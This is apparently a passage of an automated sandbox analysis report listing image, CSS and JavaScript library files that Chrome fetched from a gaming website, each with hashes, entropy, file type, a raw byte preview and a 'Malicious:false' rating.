                                                      SSDEEP:768:7+ul8A+fp932heND/+nO+cpDsPYw5ZBYL6hbxesrnnZmMQQenXqz:D+DYeB/+nLEDKYYjYXuNQtnXqz
                                                      MD5:FDFB0E81AABCA7084B51C58D99C753F0
                                                      SHA1:80231A361051FAB3A305981BE0ADFCCD5D7FE402
                                                      SHA-256:B857AA870A145F1FF24E57697EF665EEF653CD6AA87A56FAE86FB791306817C4
                                                      SHA-512:1053724CC71BBCE98838B4DACA79EADAD3FB08AB6AE62F210397AF1BC0F3C4B614F9FCF0ADA50B39297ABB21DA96D40DC0593FB18C731EA396ADAAE7F7358E4B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......JFIF.............C....................................................................C..............................................................................................................................................................................................................v..t..............................[8.xt.[19...S5$.4.yXi1.)a..............................g..NtF.2.e....]K.M.<.7......h..............................rOA..w..3..3...V2y.9p...K...1.@..........................3..?....-.q......_&.a...dq...K[.............................t.....v....X...o.z......_(..9....|..VVN......................................-....v...{I..m.7Wc..7Q...z.(.^......L.....7.K;[..............................:.g......=....].d............#.39StN...:n\.Q..<..............................x./Uo...j.[.G(..]|.x....?V.q.o.-....Ziv.^.I. ....$...D..&|..}..........S$D.......k.n..,./......q6>d.s=...b].Q.L.:...Vt..Z......7.....S....x;...p.T&....6..=..>.....K..Di..Q.Ug.....?P.|.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):24489
                                                      Entropy (8bit):7.977717516500666
                                                      Encrypted:false
                                                      SSDEEP:384:6+LRQcn3nfkoMtzocf5zB0pxdGdXE9d84G2UWFb9o9FuUjzjDTe7kZTpH8cRpPQP:6+Qc3nfkoKzFf5iGGHFo9FuAOIZTpH8P
                                                      MD5:06411062B1CDE94DE34BE7137659883B
                                                      SHA1:BD4D3FACD904BED02641A1E0EA77881C949814EA
                                                      SHA-256:CFB7AD9F7DECAE053B9C18CB238D16F783611BFDB1FF93F91682D851E4A490A4
                                                      SHA-512:691710DA22AAE8EE6E14CAC6EB993148308B4FB8AA7B27D6DBFC2BFA6F85F8AD35DE68993B7F1DB97F0A14B7FD9FF430458F35249A3F9E14D82DCAC8588EB5B2
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE.....9..........>...5.........!.... ..:....$#.9.(&!.#;......<%%F32I5.B*)"**..J..J.....0.0A.*>//''......10#.5 ..H!..H:;4,....WS.&13.7=..3...L>.P74...A,....@\.'%.:4..I.YIFU>;..-.#0..2...UY,_PNPE...58:-....i#..2.u-NCB..y..I=-/.v,K-'....N.....oS8....,Q...|.....&.b!....A..0.{h...lYR..O.l*.C.D>.8\&.#..4..<.,4.urDK(..gF;.;.p&gT....ob_..d.G.4.6F/;<....|w.=A"5.......b.A..........yylk.^...x.G.*E....W......}g^q.B.[..e'@E;De0.-......|.0:..30..._+....`_1Ls:.l...xp.oc^F....\7(.bA..?de..R,...7.}K.....[wK.q=.g..I..*u^......v.j^.8..Y.m5...nk8.i..ej~XXr+adC...W]ZpD&4E....gS.sNRKwpI{4....elb.S.O]...TFlz ..~....H ...\+..Z...Q.D....}...Z;KN.vJ.r=.CM{.&....p&AI.9.EHK..ltp.YY.5@-U`..^.."..=...........y..i....53.?W.Y..Z.n}#..8L...k|.cf....Ui.R.....\dIDATx...kZg..p5...O.C.g9..1.t)(F..7.....7.."8+...X....3.\T......^6.%.2$^..?0:rQ.E!._..}..l..=._.[.'...'T'.z5...<..9.E@.~Zf....H.hifffi.l6..V#.U..GI....e2.j..l8}tt....i.....$.!H
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 844x214, components 3
                                                      Category:downloaded
                                                      Size (bytes):29389
                                                      Entropy (8bit):7.979328075548999
                                                      Encrypted:false
                                                      SSDEEP:384:zOAdT2hjDL1C5uPFNiaxOmITLsTeZXBq3lz2HrqFrRmxbpyHovTaR65hcOFEgGUe:pEhjDgCLICeZXBKlxYpKov9ZEFt2G
                                                      MD5:38C80C4E821869DF9AE28040C4E2ABE4
                                                      SHA1:DE9D8A0F1E6628DF841EE9D05B0E0AC4678D7188
                                                      SHA-256:F6D5607FE56E39EAFFEAEE05A3E7392BD9ADCC9275E7E63F67881DB018B68B73
                                                      SHA-512:E84587A9BD387755437EFB56331B2BC7A0E1140AA41F2F645F68B000B1F0BE806B30AA435C6D6DEE5FD49A19C22BA45617C71AFA75C1F2028E65C377EA95F91B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/cms/cms_1052.jpg?ver=1611754797
                                                      Preview:......JFIF.............C....................................................................C.........................................................................L..................................................................................8.T.,>..8..L.Fr...1.=..:#...CLMTgCHQs=..&..Sa.E12...Y@.j..KV.....D.4s....CL9/ME..HY9..YH.."...).c........$.e4......:..Y.#.Ek)&P...h.9...o...!.[M./...:...A.C.Rr...a.@.%5<...E..XIh.Xi,$Xr...RT....#..PJ.4h... .c@V.d<.eI#..#J.4.i..."M..I..:..6Hl..R.T5Q..D..>....cf7....A..mc..S`....9i....u.m9(...M"efla......."I.QH.H.......&1.SA.':.Q.,..Fnf...$.....T.BJ....0-.OB.....thR".U3.KRG..........Wf8.|E..S.'.K..4..ZFT..*K.T..J.h&...s....e..>tiRI.2rG(....OY...=`93.(B....V*..$+.L.R...@....IQ..G3d.M.m...Eq...d..5.yj.N....S.g-..u.....x.^S.....B.O*.9..y.."..&U%g[YJ4..h....J!...1........x.Ni..$.P....L..i..d.TzT.LI...tFu...s8...;j...>[.4.4..a...,.H..M..Z.X..n......:sst..5..A!K.>u\.A...._:.H....F...D.......$....c:.7A.....7.4...Xi)Ju7!
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 225 x 52, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):3188
                                                      Entropy (8bit):7.823072217149618
                                                      Encrypted:false
                                                      SSDEEP:96:U4aXyVDtDCgdpI5FVmM2gH5gCMP0H1OcWdLFehW40FP:MYBDCgQVpdHmCH4lycP
                                                      MD5:C1F5E5FC61AE482E09C8F1DDC42A3D9D
                                                      SHA1:2D32AAF779F25618E328412C7A6AA735B7D442EE
                                                      SHA-256:46666FAF5F66D6F10307F942D4382A11DFD3309990807BF178523CF5293F22FC
                                                      SHA-512:0F7282962A87D1F5CE7B437EE10C9FD2EF13FB5D87212872FE6EE2DA1DF586E1BA83E64584116CE93666B6BF8BD35127C63F775847FC85A49B3C3E6B5FA7462C
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.......4.....K.......gAMA......a.....sRGB.........PLTE............666......................./...te........r.:8....STU.........na.$%&...j^.OG.1-.dX....c[... ..'........ ...^S.qd.mnn%".uxxFFG......}m..........{|....PPQg\....61.[]]......fgh...wj.............@@@888()+)(*CDD.....$...../:3.ccdGGG...hhi?7.>>>..'...455HB.!!".."KLP......YP.......TK.rrt.z"*'.......IJJOL.QN.......gggjjl)$...&BBB000.(.243......***...23<&')667{||YY[677F=.......KKL...UUVrrr?@@..3ttt555.,.%$.&&........./../.x.../..-.....;.......*..-.....2.....5....*....*..9.1../..,../.....;..........,..D..;.........u.....+..7.....9..:..5..'........G........7.(....,........,..8../././.......<..=..........?..E..2..3..3..@.....L..I.0.3..9..1.0.....6.~...4..............6....0..4.....:..3.;..9.?.....B...../z}}%....CE=..7..D...I@...+..5..C..C..C..N.....tRNS..I.....A.....A..............................O....o2............e;...........'Xs..........".:..w........!.........S.*...&....4:.RS..C................
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):27587
                                                      Entropy (8bit):7.97752720518919
                                                      Encrypted:false
                                                      SSDEEP:768:AwgojXWrT3UzlRgdyLFa39MHmp6y1tGR9p:8YXW3Y1B7HmQytIT
                                                      MD5:13B792E637EC5F58E79F69D5E4DAABD2
                                                      SHA1:5A4B18235F2DB8B489F21C7E25134C5437973CD6
                                                      SHA-256:06B87CA0BD4B1DD3819CFA00241D70596C08DC21F256EDDC1EA4D53B194698B0
                                                      SHA-512:1142DF996DEA3A9DE9B35CEE7ECF0A88D4CF8F973E112363DC4B1C6D6F73E4F9CF5801BDF00F82176155775A52676AE47C859E99D8D3ACFAB61AD21F66F4892A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....sRGB.........PLTE]A1lI3c9%X/...&....#..... ....u..g..[..N.t9.f3.V'.M..d".t)..7..@..K..T..v..../.3..5..3..;..G..W..g..r..q..Y..J..E.@.;.5.{1.i,.^(.z7.I.N.U..e.q.d.zU.\H.?8.71.++.T@.............z..m..^.uT.kM.YA.M:.eKsV>.dQ.r\.}d..q.xl..{.....................................................................|zrkmgbi]UaSIXLCPC>E;8N=0D6->/'7("0#.'....,f.A..Aj.r.....[{.*LL.2..#.-I%>[4Sp................................w..ms.bgyW\lMP^DGS>?J57A107(+2!"(........."..C...{..b.................! .$&.12.67.=B.VA..P.....w..p..Y.f.zG...d..s...................................w.r.`.vL.l<.a9.U,.M&.C.r;$|N&lD..h,.}(..9.1..Q..H..]..I..;..2.. ....................9..G..V..i.........#!z..e..W..I".<../..)....................!..'.....7".?'.J/ T8'..hQ..hqIDATx.T.g.U........T......J.DMr...zR._4...@..0..P..h.1jN..$...QsrRL.`W...:}.....I...f..k....g...!]Z.....q..F.r..s5.f.72..}.~}F.[+..:.p.~O..u.j..d<..v.Pz"!xr......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 19439
                                                      Category:downloaded
                                                      Size (bytes):3631
                                                      Entropy (8bit):7.941356607394311
                                                      Encrypted:false
                                                      SSDEEP:96:3hUgWMeBu57WkkNLprfmW51a2XEbAcN1SssymAchEkS:O7MeB3LTftXEk0pURS
                                                      MD5:2033193F3A944B6FF8B4D0E7B291621D
                                                      SHA1:F3F3BF0D8AA46B76CC111FB0593ED7757EFF95A3
                                                      SHA-256:EBE7DBD22919E7967F03BB959B691474C7A90C6C882424BC830E1302FFE9B3A5
                                                      SHA-512:C7B3B5550E41F4D8B11D79EA714585C71A486D1E4D1D83D114192BF44859C0ABCC8A2DDE29521ACC3B41168FB5DEDC1FC913E78850F1907435835730F56BF342
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/plugin/css/swiper.min.css?ver=1606790105
                                                      Preview:............ko......`.;.e'....].@./mQ..i..y.%C..$.....%J"m9.b..{.29.......W.}.M.]..=."........U...Vd.1.)..|.X.e.1.Y.,..a......Z.kZ${Z....,e..X.T..J^.<+......~...f+V.]yU..W..@?.....U...).?...R.../.....n.<....@..@k.!g......'.`Y..@y........x2D...s..H2A.yVQ....gq..]....G\..V....{V,.|..y..l.."e...8.36..$..*.gO..o...s...r.L..<..t....P.*N.r...._...=f_.-.......W...,.b.;...^.....Zlhj:..R...t..fdS.6.=Nx.f.+.=O.u<....j.g#.Y..mJ.c..N......0u.&.4.Z...AZU.].-A..~P$'...hz......t..k.P.PQayq.g.f..F....".IS.>%2......M..p......9G...f.V...^.......Z..&...`..........T`O..Y.2....|W.K...aB..r..%..*.....T.....03...l.....,F....H.g....yJ.;"%(.x.a.K.l.-...-..rWgsC..EB.......9nH..U...-@..Y.m.WlS.rYe.6.....B.ZV5SMM.x.........lC9.i)...5x..O.s.....x|.x....a.mr.0.....).4.....,d.;m....qU..8..<........U.=..V]......d.=#.........V.......O:/......./...z...C. ..N.R.}......;...nU......+f\.U../P.L.1..Pz..8.<..pY..b5..x.....a..M.`0.yiH...z..8...6......6.*..6....[.!n1...6R.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):2042
                                                      Entropy (8bit):7.541765832445623
                                                      Encrypted:false
                                                      SSDEEP:48:BajU5YgLmplDgFMoiIMW65Jv0ij+TIENQj7jw0a:BajsYP7dLBFj+UsQjNa
                                                      MD5:3724A730026D3E73D6A13896A90B37E6
                                                      SHA1:4F8170551FF51B5BEEECA7DBD1309B1FCA71FEFD
                                                      SHA-256:74FAD5B82F5C1B73DBB7E1E50E9631470D9757C5BE8D436D8576757A3D59EAC1
                                                      SHA-512:174EF0FA9975294C1FA32749BD18C940F674886C7C1581ACE32DC91DC9216572E30A5833F9EF08A63F00CD7A17F311E9F0F3B90FD228D98395F4E49F0DECC8B5
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/217_egame_logo.png?ver=1692209012
                                                      Preview:.PNG........IHDR..............P......PLTE...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^*x7....*tRNS...@pP.0....!..m.X7....`.......xE,'.L.g...K./.....IDATx....N.@... ..([,.."U.....1$..n.U1^...d..&c........................................V.G....}jZ......LI...6d.Yg.<..fd.;.>7Ni.2.o(.N.,z..L._.c.'k.%2..Q*.m.Y..J..g;q.^.0>.D....".h]].E....m(....h....]....E|.V..Z..0^U..F.......Ws.:.VG...y..rH....W_.S..i..../.T..Qa.."6.....V..;Ra.J........$.2"L.....0.|a^%."".$*.....=..f.{>7v.'..L.0...........l....q.....&....xOV.L<....e.[v..x...Vv4.a.q..V.{.fa~B.......N...8~.)Nb..0.|......p.N..............$.J.L.U.F.CO.K;..:...0.."....O.v.a`G.C..W|....C]...?T.b......].o.>..L.....&A..:..:.>L.G_....j...jT2...W7...a ....n..`....F....T..A.ia....`~!.g.T.....].9#.3...a?..a._.&Ru..S..{...i.7b.....i.1...,.N. ..f.......lU#..S..5?...........H.|*....B?....w....<h.I..O6..P.d...Cl.....L0t.....~..L`.N.%....)T.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):23291
                                                      Entropy (8bit):7.985672750586015
                                                      Encrypted:false
                                                      SSDEEP:384:x602lNDu5+FKWzpzIGHzLQhdc7Xv8wKj6RXgi1d23xDWt8qlrBjMfWvSlZqyl:g02OELkGfQWf8Xj6RX71cBKNrBAKSJ
                                                      MD5:920439312EFDAB1EAC3DF830AC011A0F
                                                      SHA1:106D814396D8AF18DEA95F1B72AF7CB3B514FBD2
                                                      SHA-256:14C29A88D75A8951F8F69F9F5AF9F19D49058BF1BAC119E060034A5764D7A5ED
                                                      SHA-512:E4CEEDF1CA3FE619E583C215EED76E61B017EE4E2A08D31673EA61E02E6E9F868502AD2C7604FA36ADBA24C87A14A1FCCD8B7D7ED8FA419C7CF61BC05D426945
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE_..............................x......^....rR............J..}Y.wU...gI~.....G..lK...b..................q..+..................v...........A.m.X?...w....|..............Y...te..i..p...|...K..........e.......kb..p..`?.....aL1..X..7......i(.mUT.....2..x.xdx...w*...@.......vy\.(>...S....]...........spSL...q!..1.0l 3.M=.V.........3......_,<.......C.:........u...w:2......(..J.y.3...>.$B..s..8v..X.m...~h.F....M/%...S$.....q&.^.....F.....C[.............(.&m/....................j`{....6l......H.....ME..T.>..........\@/x7.....[.........4.5A..s.....".Jc........3....lYO...Z.D1y;.j..G2.f.rE;..................8..;......T....1M.Y.........k.b.a..j.>.o.....{.....ii.8.......s..S...../..wx.v....].s..3...N.....tRNS...(...W.IDATx...y<......]..B.B..L....m.....".KcJ..d.-...C..P....e...C..n.f..S..g~...u].......{.>..88x..s{.^.A.........?1.=o..m?em]Sc=..6.z [o..}.a.p.>...Q.F}...A7.go..t
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):80
                                                      Entropy (8bit):4.907446651186467
                                                      Encrypted:false
                                                      SSDEEP:3:mSuuBehkPt0MTG42KtKMk1kRYn:mS5BeyPtgOKMkuRYn
                                                      MD5:250EA26752A01DDE68A6564BAFE65387
                                                      SHA1:CCE9987942603E9E658BE13871E81F38FFD62D6A
                                                      SHA-256:F0C330CC6B7399756B53504819D19832E551B0948C5030AB7E9675C85C093CF9
                                                      SHA-512:3517CD336EEFBE4E1832F4A293202857BA3D786702E4E5E8696CB4C699D9A8259CB62B238F841E0D825D9EEF70ED949E9019735695FD834011A2E7557CEAB978
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgly8STCB-jtNBIFDcuKYSYSBQ3cYY_6EgUNUO56vRIeCS2_uAhphDlSEgUNy4phJhIFDdxhj_oSBQ1Q7nq9?alt=proto
                                                      Preview:ChsKBw3LimEmGgAKBw3cYY/6GgAKBw1Q7nq9GgAKGwoHDcuKYSYaAAoHDdxhj/oaAAoHDVDuer0aAA==
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):15785
                                                      Entropy (8bit):7.97080678124736
                                                      Encrypted:false
                                                      SSDEEP:384:cEa2MbvUjIfN/tAaRWQSlOtmSw2bBFqsURqSNEbXRD2Ap4Cefr:Za3cEfNtyOtmYFG0haj
                                                      MD5:6E46C8D2CD0CA31B59B1E52F371DC47B
                                                      SHA1:39E15B4BBAF318288AB646900DE6A89C65B10185
                                                      SHA-256:37C6D87C44B0EC224461EB2091E1DE331615829F94CF6C0535CB5AA44BDEFA68
                                                      SHA-512:92F30FFB4E1AF10E41ABA111877C246397CB76FCB736D97E4A0379492D2D53F79B46A597F22FC65BE2BC0BED1678DA821C54EE0CAC6544D081B5DB3F42F1874F
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_northStorm.png?ver=1712128601
                                                      Preview:.PNG........IHDR...............^.....PLTE..3.....'........... #'%).,/3259<<@DDGLLPSRSXWZb^_fbgofdykf.rl..}..}..X.u=..G.ZN9$.ioY:.wP0..N..Y..L..Fo~5Xh1IU2:B7AI@HQHQ\PXcY\eZbmdhqonrxvxrs{|{.....................................................................................d0.yE.E).0.d .e0.zb$..r.dK.dpzjy.s..}..................g....O..Z".C..........l..<..6..6../u.$_t.La.;K"2=.%0.-?E1.]8.}.{...~.^ .?:6UO8.W@.iZ.;7.?<.?,.?#.<..8..3..4..Q.j..#h.Ik.?v.CQ.<0.7<.6$.7..1..4.'X.+].!R#!\21u.)k..F..R..M..H..>..;..6..4..4...;.IDATx..{.V.y..{.9_Uq.7.$.....%..d%N.L..#'....Y..?3 ...J..L...Gw.t.3.n.uq:.0..+......d.5..W.!@6..... .H\..;.}...W'_. ..O..vUiI..y..>.........<....".....Q.5..@.u..J. .2?.$6...ti&..T..@z..C.eRd.....1...}..Sc(.CI...F2.l..A5.&.. E....hB.......^S....0.6B.m....&....Q.....p...\.4?.U..].?*......y...4E. ..:3..Y....?.\uv^i.-0H..UL*..c..e...z.E..|.. .....F{8..E8j........eF8.......$r..p.y.+.C..U..T.l.M$.tv.T.....W....I(..e-.&$.Q.yt..4.0@..~.)m..m+U8>=9...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 140x250, components 3
                                                      Category:dropped
                                                      Size (bytes):8547
                                                      Entropy (8bit):7.927998815102047
                                                      Encrypted:false
                                                      SSDEEP:192:wQ6S9HweGbp09jN/JBVSZMQc5cm0pbJl2Lc6nR/XEJyNFRgBU8:b9qV8tJb5J0/l2o6R/QWFX8
                                                      MD5:4EBC390FBE6627D5ACD5EEA5396EE4CA
                                                      SHA1:3DC46AAFEE0F239AB826F1B5E0BF76A7A5CDF372
                                                      SHA-256:DAE503EA40F9FCE5AF2429CA75F89FE74B0DD62E12166DCB04F1A9BAF567C8E2
                                                      SHA-512:18C511476BF19FF35F21273ED8FFF50EDC097D340B8F722597E8EDEAAA454F63BFFE10C4C49857814E4A3FD2CD0BFE91D8EEAD18412B1794ECEE7CC1FDEE0091
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......Exif..II*.................Ducky.......<......Adobe.d............................................................................................................................................................................................................................................!....1A".Qa2.B#..q.R..bt..7.r3CDd....S.$T5'........................!1.AQa"..q.......2R...B.r.#3............?....@.P(.....@.P(.....@.P(....W.y....gd]..+eK..~)AN.@..(._....PB.@.P(.....Aw..d2s........../."Pz....(.pg7..nfWCc...c..8./.>t.?Q..L.)y&..L.5.Hd.Y1.<,.}..~)....0...|u.D.*j..@N(..1..8...E...*.....S....fG".*...g:9d..y.F4DRG.F..TU.~.....q..[s{Ec..!..d.[U............Mwy[.\..t...7Q....U...d1.p..%...\a...^.b....x.....&....S0!A....f.$rPd..RQ[...z..O@.P(.....A.v.....e...?........|...)..{K.=....#....tQ&e.D..C...>I....&..FOm..M..e.X.;.....<yq.%`G..._RI+......kkA..........y7.Ss-=..h..8...?........s.;.i8..knf..1.[P.jI............V.;?~....6.|.._r.g..*c.{..BQ>!...l.nS.t_.US..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2618
                                                      Entropy (8bit):7.533908680560106
                                                      Encrypted:false
                                                      SSDEEP:48:7Vo8mVcITSldAeWlgLp447KOArxgQKInEZLgBTY6:7VPKPSl2lIFuOmWSuLqE6
                                                      MD5:4B953271238020D059C147934029B435
                                                      SHA1:67EDCF1B9DA7410186D7538BBFB4A91278E1A98B
                                                      SHA-256:941086094EB96EE41D2B39153919C7FA7894E4C4444D4A24C581E98761310561
                                                      SHA-512:F3CD3921C8A3D73BD2A122D9562ED186D258C9ED8F9412167A51CC56781817464F3788F2DCAE4B0D1E18BAE885846FDE25A6C6800AD0D1A6C3DC89E86BD44507
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......gAMA......a.....sRGB.........PLTE........................................................................................................................................................................#..................0%"...>31...uml.|z...ldbYPNLB?)...K!R.w.$'.A.A;....f"..ag_].....................<1/............................................f...=@...XS..p..............~..........t..t.U.q..)j.l..............~wucZX............oge.......J@=............xw...VMJ.....WNK....zsq...4.....8tRNS....a.!.1.Qn...d..q$i...D.YKwT.....2..,....(...}...9..;....IDATx...C.G...b....". (*j[../DE.j.#..bK.@z.Cj...Z...?.M....6dw3.......vv..evx...M...........................................................j.}-.L.Z.D.P.}Bm....E.Z..k~.oT..;$T.B.W._ZH5..p.|_...Z./.3..K......^..!.]..[.{}.ePo%.2......Es,&i..#Zbu..Y...0......!../...J.qm.4.j.D ...S.g.oc..FB/1.1...B.)...$..4..<.c.......z........-.+t.k;I.Y."..XX.....c`...1.......2fKK.l.1..=.K.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 123 x 32, 4-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):848
                                                      Entropy (8bit):7.651617271340723
                                                      Encrypted:false
                                                      SSDEEP:24:U5lcd5baCQF2cB68STcGCaT1JIdxCzw3MgltR/nf:U5lgBaX9hGlJIbCzwLltVf
                                                      MD5:73B08A84857DE4B8BFD1628FA662874B
                                                      SHA1:9EE7975136B2E07D781DB9CBF19DC7D4A54D54A3
                                                      SHA-256:C0DCC312A05C7FB9A333FEC868CEC1652278DB7AACE30F239BAF4227E27FD7DD
                                                      SHA-512:F8D8249E6E1480CA35BF8929DA5F74565FE1DE31D139AA3E863C9AD0DB0A4B6FE75AD0BB05C0D029A06EF0D238C1670ED37AD1AC69F6F46C40E419C546F362F5
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/footer/footer-Thwate.png?ver=1606790107
                                                      Preview:.PNG........IHDR...{... ........x...'PLTE...AAA666...|||+++iii...MMM^^^WWWuuuGpL.M.D....tRNS.............=.".....IDAT8.U.k.q.....j.!.VDnH.Z...."5C..th-.!....Bi]t..S3D.q..A...&d...1..?..{.............{.`&9<..N.8<....=*..O0<.Q.g9"cz)E....[.O.k..9XuY.....xw..6p:z...^...eL.J+....../.w.y...-#.k.[.Tq.....2p<..?mLq.M..xa....cy..<.$vF1.b.U1U..>............o.f...0.$.q.......Y.....rX.$.Kc.Z]...E.|?.........W.].`.8]l<....LlY.1.U.a.......|.~.m...Q....S.f..../..6a...X..$gO..t.[..15...0...f.h.8..>..h..P'..E=.C8...V=.k..0.].=....^.8.'T..UP]...y...TI.6fr...q...r p..W.B.$<..-........mX..\./.H..(..p=.=.N.S..aFL.Qg....?.....&.e....F..*.a2\;.t....m.....h.B6,Z-@.;+6..RZ.6.)QG.....aznk.2A...a.a.W...sm.1..L.]......../.m...w........l...AT. ./|.._..l..^9...[.L..O9\...........D.V:*O..J..V.A=.ob...............w.........IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 225 x 52, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):3654
                                                      Entropy (8bit):7.7489916959733405
                                                      Encrypted:false
                                                      SSDEEP:96:bnT7i6W/yqLrihPIvwOMroyTqAXjd+TfzVlpSE:+JLXsroU0xSE
                                                      MD5:A7600C8721C979B4BA512F27D27F5302
                                                      SHA1:3C17ABE7EF649261B112C249D2525AE149F59F40
                                                      SHA-256:C18C087C20F08E0B995B3355D04C386FE18DCA348A112758922735F8A1B1C6AC
                                                      SHA-512:FB313C9018E2891570CA8C8CBCF430DC25A1A749C459405707E31CB199E13EE10DE1110EC066EC0619F3D771E0BC313A6C01F55D64AA232852EEFF0C56B528FD
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.......4.....|@_.....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:1d500673-6d2f-7948-81b9-0c3864da77c0" xmpMM:DocumentID="xmp.did:1DC83302EFFB11EE8559FFB05D7D1380" xmpMM:InstanceID="xmp.iid:1DC83301EFFB11EE8559FFB05D7D1380" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:96146813-4c25-e644-9939-6d74e35551e8" stRef:documentID="adobe:docid:photoshop:794b9680-2339-0143-8672-e68610aa39a0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Js.....XIDATx..].p....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (13814)
                                                      Category:dropped
                                                      Size (bytes):56142
                                                      Entropy (8bit):5.522721800330077
                                                      Encrypted:false
                                                      SSDEEP:1536:cJxLSEwwmr2yZPp8yQPj6OR1fdfqovoRonm7f6T:cPErPp8yQPOOR1fdfqg2l7f6T
                                                      MD5:64507221FEDDFF84C80B99C98827D76C
                                                      SHA1:5C7000638C6BAE1A1C448367822A8682D59D371F
                                                      SHA-256:5A0BE406A1BDF94A25A9D142D4124E3DCCBDEB5593CD78FB0BD234DF89DD7389
                                                      SHA-512:CC3BEBA9E9C0D1E149642C41B2BCB351972F8A1BCD9445DBB5E32FEB6C91C5D851E2CECAD5A6B3F8B8EC4727E4E8CF9824BC80244BAEAAE20023C23C1A02C2F0
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:/*! JSEncrypt v2.3.1 | https://npmcdn.com/jsencrypt@2.3.1/LICENSE.txt */.!function(t,e){"function"==typeof define&&define.amd?define(["exports"],e):e("object"==typeof exports&&"string"!=typeof exports.nodeName?module.exports:t)}(this,function(t){function e(t,e,i){null!=t&&("number"==typeof t?this.fromNumber(t,e,i):null==e&&"string"!=typeof t?this.fromString(t,256):this.fromString(t,e))}function i(){return new e(null)}function r(t,e,i,r,s,n){for(;--n>=0;){var o=e*this[t++]+i[r]+s;s=Math.floor(o/67108864),i[r++]=67108863&o}return s}function s(t,e,i,r,s,n){for(var o=32767&e,h=e>>15;--n>=0;){var a=32767&this[t],u=this[t++]>>15,c=h*a+u*o;a=o*a+((32767&c)<<15)+i[r]+(1073741823&s),s=(a>>>30)+(c>>>15)+h*u+(s>>>30),i[r++]=1073741823&a}return s}function n(t,e,i,r,s,n){for(var o=16383&e,h=e>>14;--n>=0;){var a=16383&this[t],u=this[t++]>>14,c=h*a+u*o;a=o*a+((16383&c)<<14)+i[r]+s,s=(a>>28)+(c>>14)+h*u,i[r++]=268435455&a}return s}function o(t){return Be.charAt(t)}function h(t,e){var i=Ke[t.charCodeAt
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
